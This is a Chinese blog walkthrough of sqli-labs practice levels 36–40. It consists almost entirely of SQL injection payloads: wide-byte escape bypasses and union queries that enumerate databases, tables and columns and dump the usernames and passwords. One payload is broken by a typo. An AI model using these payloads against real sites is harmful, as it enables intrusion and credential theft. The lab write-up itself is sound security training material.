首页 > 数据库 >sqli-labs靶场通关攻略(36-40关)

sqli-labs靶场通关攻略(36-40关)

时间:2024-08-27 19:24:00浏览次数:12  
标签:union 36 40 labs --+ table id select schema

第36关(宽字节注入(Bypass MySQL Real Escape String)

查数据库

?id=-1%df%27%20union%20select%202,database(),3%20--+

 

查表

?id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

查列

?id=-1%df' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x7573657273 --+

查数据

?id=-1%df' union select 1,group_concat(username,password),3 from users --+

第37关(post宽字节注入(MySQL_real_escape_string) )

我们这关要用到抓包工具进行抓包,因为这关是post注入嘛

登录的时候进行抓包

查库

%df' union select 1,database() --+

查表

%df' union select 1,group_concat(table_name)from information_schema.tables where table_schema=database() --+

查列

%df' union select 1,group_concat(column_name)from information_schema.columns where table_schema=database() and table_name=0x7573657273

查数据

%df' union select 1,group_concat(username,password)from users--+

第38关(联合查询/也可堆叠注入)

查库

?id=-1' union select 1,database(),3 --+

查表

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

查列

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema= database() and table_name=0x7573657273 --+

查数据

?id=-1' union select 1,group_concat(username,password),3 from users --+

第39关(联合查询)

查数据库

?id=-1 unin select 1,database(),3 --+

查表

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

查列

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x7573657273

查数据

?id=-1 union select 1,group_concat(username,password),3 from users --+

 

第40关( ') 闭合)

查数据库

?id=-1') union select 1,database(),3 --+

查表

?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+ 

查列

?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x7573657273 --+

查数据

?id=-1') union select 1,group_concat(username,password),3 from users --+

标签:union,36,40,labs,--+,table,id,select,schema
From: https://blog.csdn.net/Nai_zui_jiang/article/details/141607876

相关文章

  • 软设每日一练1——(16进制快速算结果)若用256K×8bit存储器芯片,构成地址40000000H到400F
    题目:若用256K× 8bit的存储器芯片,构成地址40000000H到400FFFFFH且按字节编址的内存区域,则需(        )片芯片A.4        B.8        C.16        D.32        答案:A解:1、首先看单位,存储器芯片单位是256K× 8bit,地址是字节......
  • ABC368
     D树从叶子到根,对于某个点,如果其子树不存在需要的点,那么这个点和它的父亲所连的边,自然不需要,否则需要。有一个问题,比如需要点2、4、5,那么点1和点2所连的边也算进去了。实际上,到了它们的LCS(最大公共祖先)后,这些边就不用算了。用一个变量统计当前遍历过多少需要的点,如果所有需要......
  • Dynamics 365组织服务中的批量操作
    参考原文:https://learn.microsoft.com/en-us/power-apps/developer/data-platform/bulk-operations?tabs=sdk总结版本一次只能批量创建/更新同一个实体的不同记录,不同的还是得走多个。upsert是个丑东西。CreateMultipleRequestcreateMultipleRequest=new(){Targets=en......
  • P8436 【模板】边双连通分量
         ~~~~~     P8436【模板】边双连通分量     ~~~~~......
  • 记一场 ABC364
    于洛谷专栏获得更差的阅读体验。于CSDN获得更一般的阅读体验。赛时ACABCD,赛后补出了E。由于比赛在一个月前,本来已经忘记这场比赛了,直到我看到了:(来自一位超厉害的小学同学神犇)\(364\)?很近的比赛啊,我打过吗?似乎打过?打开题目一看:这不就是斯坦纳树板题吗?但我为什么没印象?......
  • 【408精华知识】控制器考点总结
    CPU由运算器和控制器构成,控制器包括PC、IR、MAR、MDR、CU等部分构成,其中CU是控制单元,负责分析指令并发出各种微操作命令序列,其分为硬布线控制器与微程序控制器两种,常考硬布线控制器的概念、微程序控制器的概念和工作原理、两种控制器的对比、RISC与CISC的对比。文章目......
  • 【408精华知识】速看!操作系统基本概念大总结!!
    文章目录(0)操作系统概念图解(1)操作系统的概念(2)操作系统的特征(3)操作系统的功能(4)操作系统的发展(5)操作系统的引导(6)虚拟机(0)操作系统概念图解初学操作系统之时,可能会对操作系统的概念、作用等基础知识比较模糊,本文将以图为对象,用通俗易懂的语言对操作系统的基础知识进行讲......
  • T240827【定理3.3 Cauchy积分定理的 Goursat 证明】
    [T240819]Cauchy积分定理:设\(f(z)\)在\(z\)平面上的单连通区域\(D\)内解析,\(C\)为\(D\)内的任一条周线,则\[\int_Cf(z)~\mathrmdz=0\]证:【Goursat证明】Step1:若\(C\)为\(D\)内任一三角形\(\Delta\).假设\(|\int_{\Delta}f(z)~\mathrmdz|=M\),下证......
  • MURF1640CT-ASEMI智能AI专用MURF1640CT
    编辑:llMURF1640CT-ASEMI智能AI专用MURF1640CT型号:MURF1640CT品牌:ASEMI封装:ITO-220AB批号:最新最大平均正向电流(IF):16A最大循环峰值反向电压(VRRM):400V最大正向电压(VF):0.95V~1..90V工作温度:-50°C~150°C反向恢复时间:35ns芯片个数:2芯片尺寸:74mil引脚数量:3正向浪涌电流(IFMS......
  • 网站提示403 禁止访问怎么办
    当网站提示 403禁止访问 时,这意味着服务器理解了您的请求,但拒绝执行它。这通常是因为您没有权限访问所请求的资源,或者服务器配置了某些规则来阻止您的访问。以下是解决 403禁止访问 错误的一些常见方法:常见原因身份验证问题:用户可能没有正确的登录凭证来访问特定的页面或......